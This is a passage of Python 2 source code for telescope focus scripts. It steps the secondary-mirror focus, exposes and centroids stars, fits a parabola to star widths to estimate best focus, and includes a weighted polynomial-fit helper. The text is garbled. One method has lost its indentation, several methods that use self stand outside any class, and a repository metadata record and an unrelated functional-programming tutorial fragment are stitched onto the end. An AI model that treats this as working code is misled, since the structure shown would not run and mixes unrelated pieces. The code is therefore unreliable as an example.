                extremeFWHM.addVal(starMeas.fwhm)
                focPosFWHMList.append((focPos, fwhm))
                self.graphFocusMeas(focPosFWHMList, extremeFocPos, extremeFWHM)
                waitMsg = "%s done; press %s to continue" % (cmdName, btnStr,)
        # phase 2: the focus sweep itself
        self.recordUserParams(doStarPos=True)
        yield self.waitFocusSweep()
        # restore the original boresight position, if it was moved
        doRestoreBoresight = self.begBoreXYDeg != self.currBoreXYDeg
        if doRestoreBoresight:
            yield self.moveBoresight(
                self.begBoreXYDeg,
                msgStr ="Restoring original boresight position",
                doWait = True,
            )
        # take a final full-frame image if exposures were windowed or the
        # boresight moved; clear didTakeImage so end() does not repeat this
        if self.didTakeImage and (self.doWindow or doRestoreBoresight):
            self.didTakeImage = False # to prevent end from taking another image
            self.sr.showMsg("Taking a final image")
            exposeCmdDict = self.getExposeCmdDict(doWindow=False)
            yield sr.waitCmd(**exposeCmdDict)
    def setCurrFocus(self, *args):
        """Set center focus to current focus.

        Callback for the "Center Focus" button; extra args are ignored.
        Warns (without raising) if the current focus is unknown.
        """
        currFocus = self.sr.getKeyVar(self.tccModel.secFocus, defVal=None)
        if currFocus is None:
            self.sr.showMsg("Current focus not known",
                severity=RO.Constants.sevWarning,
            )
            return
        self.centerFocPosWdg.set(currFocus)
        self.sr.showMsg("")
    def setGraphRange(self, extremeFocPos=None, extremeFWHM=None):
        """Sets the displayed range of the graph.

        Inputs:
        - extremeFocPos: focus extremes (an Extremes object)
        - extremeFWHM: FWHM extremes (an Extremes object)
        """
        # "setGraphRange(extremeFocPos=%s, extremeFWHM=%s)" % (extremeFocPos, extremeFWHM)
        if extremeFocPos and extremeFocPos.isOK():
            # pad the focus range; widen further if it is too narrow to read
            minFoc = extremeFocPos.minVal - self.FocGraphMargin
            maxFoc = extremeFocPos.maxVal + self.FocGraphMargin
            if maxFoc - minFoc < 50:
                minFoc -= 25
                maxFoc += 25
            self.plotAxis.set_xlim(minFoc, maxFoc)
        if extremeFWHM and extremeFWHM.isOK():
            # 5% margin on either side of the FWHM range
            minFWHM = extremeFWHM.minVal * 0.95
            maxFWHM = extremeFWHM.maxVal * 1.05
            self.plotAxis.set_ylim(minFWHM, maxFWHM)
        self.figCanvas.draw()
def setStarPos(self, starXYPix):
"""Set star position widgets.
Inputs:
- starXYPix: star x, y position (binned pixels)
"""
for ii in range(2):
wdg = self.starPosWdgSet[ii]
wdg.set(starXYPix[ii])
def updBinFactor(self, *args, **kargs):
    """Callback for the bin factor widget: rescale the displayed star position.

    Ignores non-positive or unchanged values.
    """
    binFac = self.binFactorWdg.getNum()
    if binFac <= 0 or binFac == self.dispBinFactor:
        return
    prevBinFac = self.dispBinFactor
    self.dispBinFactor = binFac
    # binned position scales inversely with bin factor
    scale = float(prevBinFac) / float(binFac)
    for wdg in self.starPosWdgSet[:2]:
        pos = wdg.getNum()
        if pos == 0:
            # 0 means "not set"; leave it alone
            continue
        wdg.set(pos * scale)
def updFocusIncr(self, *args):
    """Recompute the focus increment from the range and number of positions
    and display it; warn if it falls below the minimum allowed increment.
    """
    rangeVal = self.focusRangeWdg.getNumOrNone()
    numPosVal = self.numFocusPosWdg.getNumOrNone()
    if rangeVal is None or numPosVal is None:
        self.focusIncrWdg.set(None, isCurrent = False)
        return
    # numPosVal positions span the range in numPosVal - 1 steps
    incr = rangeVal / float(numPosVal - 1)
    incrOK = incr >= self.MinFocusIncr
    if not incrOK:
        self.sr.showMsg(
            "Focus increment too small (< %s %s)" % (self.MinFocusIncr, MicronStr),
            RO.Constants.sevWarning,
        )
    self.focusIncrWdg.set(incr, isCurrent = incrOK)
def waitCentroid(self):
    """Take an exposure and centroid at the current star position.

    Sets sr.value to a populated StarMeas if the centroid succeeded,
    else to an empty StarMeas.
    Raises ScriptError if the exposure itself failed (no image file).
    """
    sr = self.sr
    centroidCmdStr = "centroid on=%0.1f,%0.1f cradius=%0.1f %s" % \
        (self.relStarPos[0], self.relStarPos[1], self.centroidRadPix, self.formatExposeArgs())
    yield sr.waitCmd(
        actor = self.gcamActor,
        cmdStr = centroidCmdStr,
        keyVars = (self.guideModel.files, self.guideModel.star),
        checkFail = False,  # failure is diagnosed below instead of aborting the script
    )
    cmdVar = sr.value
    self.didTakeImage = True
    if sr.debug:
        # debug mode: synthesize star data instead of talking to the hub
        starData = makeStarData("c", self.relStarPos)
    else:
        starData = cmdVar.getKeyVarData(self.guideModel.star)
    if starData:
        sr.value = StarMeas.fromStarKey(starData[0])
        return
    else:
        sr.value = StarMeas()
    # no star data: distinguish "no star found" from "exposure failed"
    if not cmdVar.getKeyVarData(self.guideModel.files):
        raise sr.ScriptError("exposure failed")
def waitExtraSetup(self):
    """Hook executed once per run, after initAll and getInstInfo but before
    anything else.

    Subclasses override this to e.g. move the boresight or configure the
    instrument; the base implementation just yields a 1 ms wait.
    """
    yield self.sr.waitMS(1)
def waitFindStar(self):
    """Take a full-frame exposure and find the best star that can be centroided.

    Sets sr.value to a StarMeas (empty if no star was found, in which case
    a warning is displayed).
    Raises ScriptError if the exposure fails, or RuntimeError if star
    finding is disabled (maxFindAmpl is None).
    """
    sr = self.sr
    if self.maxFindAmpl is None:
        raise RuntimeError("Find disabled; maxFindAmpl=None")
    self.sr.showMsg("Exposing %s sec to find best star" % (self.expTime,))
    findStarCmdStr = "findstars " + self.formatExposeArgs(doWindow=False)
    yield sr.waitCmd(
        actor = self.gcamActor,
        cmdStr = findStarCmdStr,
        keyVars = (self.guideModel.files, self.guideModel.star),
        checkFail = False,  # failure is diagnosed below
    )
    cmdVar = sr.value
    self.didTakeImage = True
    if self.sr.debug:
        filePath = "debugFindFile"
    else:
        if not cmdVar.getKeyVarData(self.guideModel.files):
            raise sr.ScriptError("exposure failed")
        # hub-relative file path = concatenation of items 2:4 of the files keyword
        fileInfo = cmdVar.getKeyVarData(self.guideModel.files)[0]
        filePath = "".join(fileInfo[2:4])
    if self.sr.debug:
        starDataList = makeStarData("f", (50.0, 75.0))
    else:
        starDataList = cmdVar.getKeyVarData(self.guideModel.star)
    if not starDataList:
        sr.value = StarMeas()
        self.sr.showMsg("No stars found", severity=RO.Constants.sevWarning)
        return
    yield self.waitFindStarInList(filePath, starDataList)
def waitFindStarInList(self, filePath, starDataList):
    """Centroid the first usable star in starDataList.

    If a suitable star is found, sets sr.value to its StarMeas.
    Otherwise logs a warning and sets sr.value to an empty StarMeas.

    Inputs:
    - filePath: image file path on hub, relative to image root
        (e.g. concatenate items 2:4 of the guider Files keyword)
    - starDataList: list of star keyword data
    """
    sr = self.sr
    if self.maxFindAmpl is None:
        raise RuntimeError("Find disabled; maxFindAmpl=None")
    for starData in starDataList:
        starXYPos = starData[2:4]
        starAmpl = starData[14]
        # reject stars that are too bright (amplitude above maxFindAmpl)
        # or that have no amplitude measurement
        if (starAmpl is None) or (starAmpl > self.maxFindAmpl):
            continue
        sr.showMsg("Centroiding star at %0.1f, %0.1f" % tuple(starXYPos))
        centroidCmdStr = "centroid file=%s on=%0.1f,%0.1f cradius=%0.1f" % \
            (filePath, starXYPos[0], starXYPos[1], self.centroidRadPix)
        yield sr.waitCmd(
            actor = self.gcamActor,
            cmdStr = centroidCmdStr,
            keyVars = (self.guideModel.star,),
            checkFail = False,  # a star that fails to centroid is simply skipped
        )
        cmdVar = sr.value
        if sr.debug:
            starData = makeStarData("f", starXYPos)
        else:
            starData = cmdVar.getKeyVarData(self.guideModel.star)
        if starData:
            # success: report the first star that centroids and stop searching
            sr.value = StarMeas.fromStarKey(starData[0])
            return
    sr.showMsg("No usable star fainter than %s ADUs found" % self.maxFindAmpl,
        severity=RO.Constants.sevWarning)
    sr.value = StarMeas()
def waitFocusSweep(self):
    """Conduct a focus sweep: step through focus positions, measure FWHM at
    each, fit a parabola and (optionally) move to the fitted best focus.

    Raises ScriptError on bad user inputs, a failed fit or an out-of-range
    best focus.
    """
    sr = self.sr
    focPosFWHMList = []
    self.logWdg.addMsg("===== Sweep =====")
    self.clearGraph()
    centerFocPos = float(self.getEntryNum(self.centerFocPosWdg))
    focusRange = float(self.getEntryNum(self.focusRangeWdg))
    startFocPos = centerFocPos - (focusRange / 2.0)
    endFocPos = startFocPos + focusRange
    numFocPos = self.getEntryNum(self.numFocusPosWdg)
    if numFocPos < 3:
        raise sr.ScriptError("need at least three focus positions")
    focusIncr = self.focusIncrWdg.getNum()
    if focusIncr < self.MinFocusIncr:
        raise sr.ScriptError("focus increment too small (< %s %s)" % (self.MinFocusIncr, MicronStr))
    # focDir records the sweep direction; used for backlash compensation
    self.focDir = (endFocPos > startFocPos)
    extremeFocPos = Extremes(startFocPos)
    extremeFocPos.addVal(endFocPos)
    extremeFWHM = Extremes()
    self.setGraphRange(extremeFocPos=extremeFocPos)
    numMeas = 0
    # if the sweep is aborted or fails, restore the center focus
    self.focPosToRestore = centerFocPos
    for focInd in range(numFocPos):
        focPos = float(startFocPos + (focInd*focusIncr))
        # compensate for drive backlash only on the first move of the sweep
        doBacklashComp = (focInd == 0)
        yield self.waitSetFocus(focPos, doBacklashComp)
        sr.showMsg("Exposing for %s sec at focus %0.0f %s" % \
            (self.expTime, focPos, MicronStr))
        yield self.waitCentroid()
        starMeas = sr.value
        if sr.debug:
            # synthesize a noisy parabola in debug mode
            starMeas.fwhm = 0.0001 * (focPos - centerFocPos) ** 2
            starMeas.fwhm += random.gauss(1.0, 0.25)
        extremeFWHM.addVal(starMeas.fwhm)
        self.logStarMeas("Sw %d" % (focInd+1,), focPos, starMeas)
        if starMeas.fwhm is not None:
            focPosFWHMList.append((focPos, starMeas.fwhm))
            self.graphFocusMeas(focPosFWHMList, extremeFWHM=extremeFWHM)
    # Fit a curve to the data
    numMeas = len(focPosFWHMList)
    if numMeas < 3:
        raise sr.ScriptError("need at least 3 measurements to fit best focus")
    focList, fwhmList = zip(*focPosFWHMList)
    focPosArr = numpy.array(focList, dtype=float)
    fwhmArr = numpy.array(fwhmList, dtype=float)
    weightArr = numpy.ones(numMeas, dtype=float)
    # numMeas >= 3 is guaranteed by the check above, so one branch always runs
    if numMeas > 3:
        coeffs, dumYFit, dumYBand, fwhmSigma, dumCorrMatrix = polyfitw(focPosArr, fwhmArr, weightArr, 2, True)
    elif numMeas == 3:
        # too few points to measure fwhmSigma
        coeffs = polyfitw(focPosArr, fwhmArr, weightArr, 2, False)
        fwhmSigma = None
    # Make sure fit curve has a minimum (positive quadratic coefficient)
    if coeffs[2] <= 0.0:
        raise sr.ScriptError("could not find minimum focus")
    # find the best focus position (vertex of the parabola)
    bestEstFocPos = (-1.0*coeffs[1])/(2.0*coeffs[2])
    bestEstFWHM = coeffs[0]+coeffs[1]*bestEstFocPos+coeffs[2]*bestEstFocPos*bestEstFocPos
    extremeFocPos.addVal(bestEstFocPos)
    extremeFWHM.addVal(bestEstFWHM)
    self.logFitFWHM("Fit", bestEstFocPos, bestEstFWHM)
    # compute and log standard deviation, if possible
    if fwhmSigma is not None:
        focSigma = math.sqrt(fwhmSigma / coeffs[2])
        self.logFitFWHM(u"Fit \N{GREEK SMALL LETTER SIGMA}", focSigma, fwhmSigma)
    else:
        focSigma = None
        self.logWdg.addMsg(u"Warning: too few points to compute \N{GREEK SMALL LETTER SIGMA}")
    # plot fit as a curve and best fit focus as a point
    fitFocArr = numpy.arange(min(focPosArr), max(focPosArr), 1)
    fitFWHMArr = coeffs[0] + coeffs[1]*fitFocArr + coeffs[2]*(fitFocArr**2.0)
    self.plotAxis.plot(fitFocArr, fitFWHMArr, '-k', linewidth=2)
    self.plotAxis.plot([bestEstFocPos], [bestEstFWHM], 'go')
    self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
    # check fit error
    if focSigma is not None:
        maxFocSigma = self.MaxFocSigmaFac * focusRange
        if focSigma > maxFocSigma:
            raise sr.ScriptError("focus std. dev. too large: %0.0f > %0.0f" % (focSigma, maxFocSigma))
    # check that estimated best focus is in sweep range
    if not startFocPos <= bestEstFocPos <= endFocPos:
        raise sr.ScriptError("best focus=%0.0f out of sweep range" % (bestEstFocPos,))
    # move to best focus if "Move to best Focus" checked
    moveBest = self.moveBestFocus.getBool()
    if not moveBest:
        return
    self.setCurrFocus()
    yield self.waitSetFocus(bestEstFocPos, doBacklashComp=True)
    sr.showMsg("Exposing for %s sec at estimated best focus %d %s" % \
        (self.expTime, bestEstFocPos, MicronStr))
    yield self.waitCentroid()
    finalStarMeas = sr.value
    if sr.debug:
        finalStarMeas.fwhm = 1.1
    extremeFWHM.addVal(finalStarMeas.fwhm)
    self.logStarMeas("Meas", bestEstFocPos, finalStarMeas)
    finalFWHM = finalStarMeas.fwhm
    if finalFWHM is not None:
        self.plotAxis.plot([bestEstFocPos], [finalFWHM], 'ro')
        self.setGraphRange(extremeFocPos=extremeFocPos, extremeFWHM=extremeFWHM)
    else:
        raise sr.ScriptError("could not measure FWHM at estimated best focus")
    # A new best focus was picked; don't restore the original focus
    # and do set Center Focus to the new focus
    self.focPosToRestore = None
    self.centerFocPosWdg.set(int(round(bestEstFocPos)))
def waitSetFocus(self, focPos, doBacklashComp=False):
    """Adjust focus.

    To use: yield waitSetFocus(...)

    Inputs:
    - focPos: new focus position in um
    - doBacklashComp: if True, perform backlash compensation
    """
    sr = self.sr
    focPos = float(focPos)
    # to try to eliminate the backlash in the secondary mirror drive move back 1/2 the
    # distance between the start and end position from the bestEstFocPos
    if doBacklashComp and self.BacklashComp:
        # NOTE(review): self.focDir is a bool (set in waitFocusSweep), so the
        # offset is only applied when the sweep direction is increasing;
        # confirm that is the intended behavior for a decreasing sweep
        backlashFocPos = focPos - (abs(self.BacklashComp) * self.focDir)
        sr.showMsg("Backlash comp: moving focus to %0.0f %s" % (backlashFocPos, MicronStr))
        yield sr.waitCmd(
            actor = "tcc",
            cmdStr = "set focus=%0.0f" % (backlashFocPos,),
        )
        yield sr.waitMS(self.FocusWaitMS)
    # move to desired focus position
    sr.showMsg("Moving focus to %0.0f %s" % (focPos, MicronStr))
    yield sr.waitCmd(
        actor = "tcc",
        cmdStr = "set focus=%0.0f" % (focPos,),
    )
    # give the secondary mirror time to settle before exposing
    yield sr.waitMS(self.FocusWaitMS)
class SlitviewerFocusScript(BaseFocusScript):
    """Focus script for slitviewers.

    Inputs:
    - gcamActor: name of guide camera actor (e.g. "dcam")
    - instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
    - imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
    - defBoreXY: default boresight position in [x, y] arcsec;
        If an entry is None then no offset widget is shown for that axis
        and 0 is used.
    - defRadius: default centroid radius, in arcsec
    - defBinFactor: default bin factor; if None then bin factor cannot be set
    - doWindow: if True, subframe images during focus sequence
    - windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
        this is not used for star positions, which all have the same convention
    - windowIsInclusive: is the upper-right window coord included in the image?
    - helpURL: URL of help file
    - debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
    """
    def __init__(self,
        sr,
        gcamActor,
        instName,
        imageViewerTLName,
        defBoreXY,
        defRadius = 5.0,
        defBinFactor = 1,
        doWindow = True,
        windowOrigin = 0,
        windowIsInclusive = True,
        helpURL = None,
        debug = False,
    ):
        """The setup script; run once when the script runner
        window is created.
        """
        if len(defBoreXY) != 2:
            raise ValueError("defBoreXY=%s must be a pair of values" % defBoreXY)
        self.defBoreXY = defBoreXY
        # slitviewers cannot adjust the star position or find stars,
        # hence canSetStarPos=False and maxFindAmpl=None
        BaseFocusScript.__init__(self,
            sr = sr,
            gcamActor = gcamActor,
            instName = instName,
            imageViewerTLName = imageViewerTLName,
            defRadius = defRadius,
            defBinFactor = defBinFactor,
            canSetStarPos = False,
            maxFindAmpl = None,
            doWindow = doWindow,
            windowOrigin = windowOrigin,
            windowIsInclusive = windowIsInclusive,
            helpURL = helpURL,
            debug = debug,
        )

    def createSpecialWdg(self):
        """Create boresight widget(s).
        """
        sr = self.sr
        self.boreNameWdgSet = []
        for ii in range(2):
            # if no default was supplied for this axis, the widget is
            # created (so the offset is still 0.0) but not displayed
            showWdg = (self.defBoreXY[ii] is not None)
            if showWdg:
                defVal = float(self.defBoreXY[ii])
            else:
                defVal = 0.0
            letter = ("X", "Y")[ii]
            wdgLabel = "Boresight %s" % (letter,)
            boreWdg = RO.Wdg.FloatEntry(
                master = sr.master,
                label = wdgLabel,
                minValue = -60.0,
                maxValue = 60.0,
                defValue = defVal,
                defMenu = "Default",
                helpText = wdgLabel + " position",
                helpURL = self.helpURL,
            )
            if showWdg:
                self.gr.gridWdg(boreWdg.label, boreWdg, "arcsec")
            self.boreNameWdgSet.append(boreWdg)

    def moveBoresight(self, boreXYDeg, msgStr="Moving the boresight", doWait=True):
        """Move the boresight to the specified position and sets starPos accordingly.

        Waits if doWait true (in which case you must use "yield").

        Records the initial boresight position in self.begBoreXYDeg, if not already done.
        """
        sr = self.sr
        cmdStr = "offset boresight %0.7f, %0.7f/pabs/computed" % (boreXYDeg[0], boreXYDeg[1])
        # save the initial boresight position, if not already done
        if self.begBoreXYDeg is None:
            begBorePVTs = sr.getKeyVar(self.tccModel.boresight, ind=None)
            if not sr.debug:
                begBoreXYDeg = [RO.CnvUtil.posFromPVT(pvt) for pvt in begBorePVTs]
                if None in begBoreXYDeg:
                    raise sr.ScriptError("current boresight position unknown")
                self.begBoreXYDeg = begBoreXYDeg
            else:
                self.begBoreXYDeg = [0.0, 0.0]
            # "self.begBoreXYDeg=%r" % self.begBoreXYDeg
        # move boresight and adjust star position accordingly:
        # convert the boresight offset (deg) to unbinned pixels
        starXYPix = [(boreXYDeg[ii] * self.instScale[ii]) + self.instCtr[ii] for ii in range(2)]
        if msgStr:
            sr.showMsg(msgStr)
        self.currBoreXYDeg = boreXYDeg
        self.setStarPos(starXYPix)
        if doWait:
            yield sr.waitCmd(
                actor = "tcc",
                cmdStr = cmdStr,
            )
        else:
            sr.startCmd(
                actor = "tcc",
                cmdStr = cmdStr,
            )

    def waitExtraSetup(self):
        """Executed once at the start of each run
        after calling initAll and getInstInfo but before doing anything else.

        Override to do things such as put the instrument into a particular mode.
        """
        # set boresight and star position and shift boresight
        # (widget values are in arcsec; convert to degrees)
        boreXYDeg = [self.getEntryNum(wdg) / 3600.0 for wdg in self.boreNameWdgSet]
        yield self.moveBoresight(boreXYDeg, doWait=True)
class OffsetGuiderFocusScript(BaseFocusScript):
    """Focus script for offset guiders.

    Inputs:
    - gcamActor: name of guide camera actor (e.g. "dcam")
    - instPos: name of instrument position (e.g. "NA2"); case doesn't matter
    - imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
    - defRadius: default centroid radius, in arcsec
    - defBinFactor: default bin factor; if None then bin factor cannot be set
    - maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
        if None then star finding is disabled.
    - doWindow: if True, subframe images during focus sequence
    - windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
        this is not used for star positions, which all have the same convention
    - windowIsInclusive: is the upper-right window coord included in the image?
    - helpURL: URL of help file
    - debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
    """
    def __init__(self,
        sr,
        gcamActor,
        instPos,
        imageViewerTLName,
        defRadius = 5.0,
        defBinFactor = 1,
        maxFindAmpl = None,
        doWindow = True,
        windowOrigin = 0,
        windowIsInclusive = True,
        helpURL = None,
        debug = False,
    ):
        """The setup script; run once when the script runner
        window is created.
        """
        BaseFocusScript.__init__(self,
            sr = sr,
            gcamActor = gcamActor,
            instName = None,
            imageViewerTLName = imageViewerTLName,
            defRadius = defRadius,
            defBinFactor = defBinFactor,
            maxFindAmpl = maxFindAmpl,
            doWindow = doWindow,
            windowOrigin = windowOrigin,
            windowIsInclusive = windowIsInclusive,
            helpURL = helpURL,
            debug = debug,
        )
        self.instPos = instPos

    def getInstInfo(self):
        """Obtains instrument data (in this case guider data).

        Verifies the correct instrument and sets these attributes:
        - instScale: x,y image scale in unbinned pixels/degree
        - instCtr: x,y image center in unbinned pixels
        - instLim: xmin, ymin, xmax, ymax image limits, inclusive, in unbinned pixels
        - arcsecPerPixel: image scale in arcsec/unbinned pixel;
            average of x and y scales

        Raises ScriptError if wrong instrument.
        """
        sr = self.sr
        if not sr.debug:
            # Make sure current instrument is correct
            try:
                currInstPosName = sr.getKeyVar(self.tccModel.instPos)
            except sr.ScriptError:
                raise sr.ScriptError("current instrument position unknown")
            if not currInstPosName.lower() == self.instPos.lower():
                raise sr.ScriptError("%s is not the current instrument position (%s)!" % (self.instPos, currInstPosName))
            self.instScale = sr.getKeyVar(self.tccModel.gimScale, ind=None)
            self.instCtr = sr.getKeyVar(self.tccModel.gimCtr, ind=None)
            self.instLim = sr.getKeyVar(self.tccModel.gimLim, ind=None)
        else:
            # data from tcc tinst:I_NA2_DIS.DAT 18-OCT-2006
            self.instScale = [-12066.6, 12090.5] # unbinned pixels/deg
            self.instCtr = [240, 224]
            self.instLim = [0, 0, 524, 511]
        # mean of |x| and |y| scales, converted to arcsec per unbinned pixel
        self.arcsecPerPixel = 3600.0 * 2 / (abs(self.instScale[0]) + abs(self.instScale[1]))
class ImagerFocusScript(BaseFocusScript):
    """Focus script for imaging instrument.

    This is like an Offset Guider but the exposure commands
    are sent to the instrument actor and centroid and findstars commands
    are sent to nexpose using the image just taken.

    For now there is no standard way to handle windowing and binning
    so each instrument must override waitExpose to use windowing.
    As a result the default value of doWindow is false.

    However, if the exposure command gets arguments for windowing
    then this will all change.

    Inputs:
    - instName: name of instrument (e.g. "DIS"); must be a name known to TUI.Inst.ExposeModel.
    - imageViewerTLName: name of image viewer toplevel (e.g. "Guide.DIS Slitviewer")
    - defRadius: default centroid radius, in arcsec
    - defBinFactor: default bin factor; if None then bin factor cannot be set
    - maxFindAmpl: maximum star amplitude for finding stars (peak - sky in ADUs);
        if None then star finding is disabled.
    - doWindow: if True, subframe images during focus sequence
    - windowOrigin: index of left or lower pixel for window (0 or 1 unless very wierd);
        this is not used for star positions, which all have the same convention
    - windowIsInclusive: is the upper-right window coord included in the image?
    - doZeroOverscan: if True then set overscan to zero
    - helpURL: URL of help file
    - debug: if True, run in debug mode, which uses fake data and does not communicate with the hub.
    """
    def __init__(self,
        sr,
        instName,
        imageViewerTLName = None,
        defRadius = 5.0,
        defBinFactor = 1,
        maxFindAmpl = None,
        doWindow = False,
        windowOrigin = 1,
        windowIsInclusive = True,
        doZeroOverscan = False,
        helpURL = None,
        debug = False,
    ):
        """The setup script; run once when the script runner
        window is created.
        """
        # this is a hack for now: hard-coded instrument -> focus actor map
        gcamActor = {
            "nicfps": "nfocus",
            "spicam": "sfocus",
        }[instName.lower()]
        BaseFocusScript.__init__(self,
            sr = sr,
            gcamActor = gcamActor,
            instName = instName,
            imageViewerTLName = imageViewerTLName,
            defRadius = defRadius,
            defBinFactor = defBinFactor,
            maxFindAmpl = maxFindAmpl,
            doWindow = doWindow,
            windowOrigin = windowOrigin,
            windowIsInclusive = windowIsInclusive,
            helpURL = helpURL,
            debug = debug,
        )
        self.exposeModel = TUI.Inst.ExposeModel.getModel(instName)
        self.doZeroOverscan = bool(doZeroOverscan)

    def formatBinFactorArg(self):
        """Return bin factor argument for expose/centroid/findstars command"""
        # if the bin factor cannot be set, omit the argument entirely
        if self.defBinFactor is None:
            return ""
        return "bin=%d,%d" % (self.binFactor, self.binFactor)

    def formatExposeArgs(self, doWindow=True):
        """Format arguments for exposure command.

        Inputs:
        - doWindow: if true, window the exposure (if permitted)
        """
        try:
            retStr = BaseFocusScript.formatExposeArgs(self, doWindow)
        except TypeError:
            # try to shed light on an intermittent bug
            print "Focus script bug diagnostic information"
            print "self.__class__ =", self.__class__
            print "inheritance tree =", inspect.getclasstree([self.__class__])
            raise
        # tag the image name so focus images are easy to identify
        retStr += " name=%s_focus" % (self.exposeModel.instInfo.instActor,)
        if self.doZeroOverscan:
            retStr += " overscan=0,0"
        return retStr

    def waitCentroid(self):
        """Take an exposure and centroid the image at the current star position.

        If the centroid is found, sets sr.value to a populated StarMeas;
        otherwise sets sr.value to an empty StarMeas.
        """
        sr = self.sr
        # the instrument takes the image; the guide actor centroids the file
        yield self.waitExpose()
        filePath = sr.value
        centroidCmdStr = "centroid file=%s on=%0.1f,%0.1f cradius=%0.1f" % \
            (filePath, self.relStarPos[0], self.relStarPos[1], self.centroidRadPix)
        yield sr.waitCmd(
            actor = self.gcamActor,
            cmdStr = centroidCmdStr,
            keyVars = (self.guideModel.star,),
            checkFail = False,
        )
        cmdVar = sr.value
        if sr.debug:
            starData = makeStarData("c", self.relStarPos)
        else:
            starData = cmdVar.getKeyVarData(self.guideModel.star)
        if starData:
            sr.value = StarMeas.fromStarKey(starData[0])
        else:
            sr.value = StarMeas()

    def getExposeCmdDict(self, doWindow=True):
        """Get basic command arument dict for an expose command

        This includes actor, cmdStr, abortCmdStr
        """
        return dict(
            actor = self.exposeModel.actor,
            cmdStr = "object " + self.formatExposeArgs(doWindow),
            abortCmdStr = "abort",
        )

    def waitExpose(self, doWindow=True):
        """Take an exposure.

        Return the file path of the exposure in sr.value.

        Raise ScriptError if the exposure fails.
        """
        sr = self.sr
        self.sr.showMsg("Exposing for %s sec" % (self.expTime,))
        basicCmdDict = self.getExposeCmdDict(doWindow)
        yield sr.waitCmd(
            keyVars = (self.exposeModel.files,),
            checkFail = False,
            **basicCmdDict
        )
        cmdVar = sr.value
        fileInfoList = cmdVar.getKeyVarData(self.exposeModel.files)
        if self.sr.debug:
            fileInfoList = [("me", "localhost", "tmp", "debug", "me", "test.fits")]
        if not fileInfoList:
            raise self.sr.ScriptError("exposure failed")
        # full path = concatenation of items 2:6 of the files keyword
        filePath = "".join(fileInfoList[0][2:6])
        sr.value = filePath

    def waitFindStar(self):
        """Take a full-frame exposure and find the best star that can be centroided.

        Set sr.value to StarMeas for found star.

        If no star found displays a warning and sets sr.value to empty StarMeas.
        """
        sr = self.sr
        yield self.waitExpose(doWindow=False)
        filePath = sr.value
        findStarCmdStr = "findstars file=%s" % (filePath,)
        yield sr.waitCmd(
            actor = self.gcamActor,
            cmdStr = findStarCmdStr,
            keyVars = (self.guideModel.star,),
            checkFail = False,
        )
        cmdVar = sr.value
        self.didTakeImage = True
        if self.sr.debug:
            starDataList = makeStarData("f", (50.0, 75.0))
        else:
            starDataList = cmdVar.getKeyVarData(self.guideModel.star)
        if not starDataList:
            sr.value = StarMeas()
            self.sr.showMsg("No stars found", severity=RO.Constants.sevWarning)
            return
        yield self.waitFindStarInList(filePath, starDataList)
def polyfitw(x, y, w, ndegree, return_fit=False):
    """
    Performs a weighted least-squares polynomial fit with optional error estimates.

    Inputs:
        x:
            The independent variable vector (numpy array).
        y:
            The dependent variable vector (numpy array). This vector should be
            the same length as x.
        w:
            The vector of weights (numpy array). This vector should be same
            length as x and y.
        ndegree:
            The degree of polynomial to fit.
        return_fit:
            If false (the default) return only the coefficient vector.

    Outputs:
        If return_fit is false then polyfitw returns only c, a vector of
        coefficients of length ndegree+1 (constant term first).
        If return_fit is true then polyfitw returns a tuple (c, yfit, yband, sigma, a)
            yfit:
                The vector of calculated y's. Has an error of + or - yband.
            yband:
                Error estimate for each point = 1 sigma.
            sigma:
                The standard deviation in y units.
            a:
                Correlation matrix of the coefficients.

    Written by: George Lawrence, LASP, University of Colorado,
        December, 1981 in IDL.
        Weights added, April, 1987, G. Lawrence
        Fixed bug with checking number of params, November, 1998,
        Mark Rivers.
        Python version, May 2002, Mark Rivers
    """
    n = min(len(x), len(y))  # size = smaller of x,y
    m = ndegree + 1  # number of elements in coeff vector
    a = numpy.zeros((m, m), float)  # least square matrix, weighted matrix
    b = numpy.zeros(m, float)  # will contain sum w*y*x^j
    z = numpy.ones(n, float)  # basis vector for constant term
    a[0, 0] = numpy.sum(w)
    b[0] = numpy.sum(w * y)
    for p in range(1, 2 * ndegree + 1):  # power loop
        z = z * x  # z is now x^p
        if p < m:
            b[p] = numpy.sum(w * y * z)  # b is sum w*y*x^j
        # weighted sum of x^p; fills the anti-diagonal a[j, p-j]
        # (renamed from "sum", which shadowed the builtin)
        powSum = numpy.sum(w * z)
        for j in range(max(0, (p - ndegree)), min(ndegree, p) + 1):
            a[j, p - j] = powSum
    a = numpy.linalg.inv(a)
    c = numpy.dot(b, a)
    if not return_fit:
        return c  # exit if only fit coefficients are wanted
    # compute optional output parameters.
    yfit = numpy.zeros(n, float) + c[0]  # one-sigma error estimates, init
    for k in range(1, ndegree + 1):
        yfit = yfit + c[k] * (x ** k)  # sum basis vectors
    # NOTE: assumes n > m; if n == m the variance estimate divides by zero
    var = numpy.sum((yfit - y) ** 2) / (n - m)  # variance estimate, unbiased
    sigma = numpy.sqrt(var)
    yband = numpy.zeros(n, float) + a[0, 0]
    z = numpy.ones(n, float)
    for p in range(1, 2 * ndegree + 1):  # compute correlated error estimates on y
        z = z * x  # z is now x^p
        # accumulate the anti-diagonal of the correlation matrix
        # (renamed from "sum", which shadowed the builtin)
        errSum = 0.
        for j in range(max(0, (p - ndegree)), min(ndegree, p) + 1):
            errSum = errSum + a[j, p - j]
        yband = yband + errSum * z  # add in all the error sources
    yband = yband * var
    yband = numpy.sqrt(yband)
    return c, yfit, yband, sigma, a
| {
"repo_name": "r-owen/stui",
"path": "TUI/Base/BaseFocusScript.py",
"copies": "1",
"size": "70727",
"license": "bsd-3-clause",
"hash": 5207280033848373000,
"line_mean": 38.66741447,
"line_max": 126,
"alpha_frac": 0.5892516295,
"autogenerated": false,
"ratio": 3.804981708629223,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9781287394471703,
"avg_score": 0.02258918873150419,
"num_lines": 1783
} |
# A basic functional programming in Python
# a function to calculate a squared number
def square(n):
return n ** 2
# Lambda expression to calculate a squared number
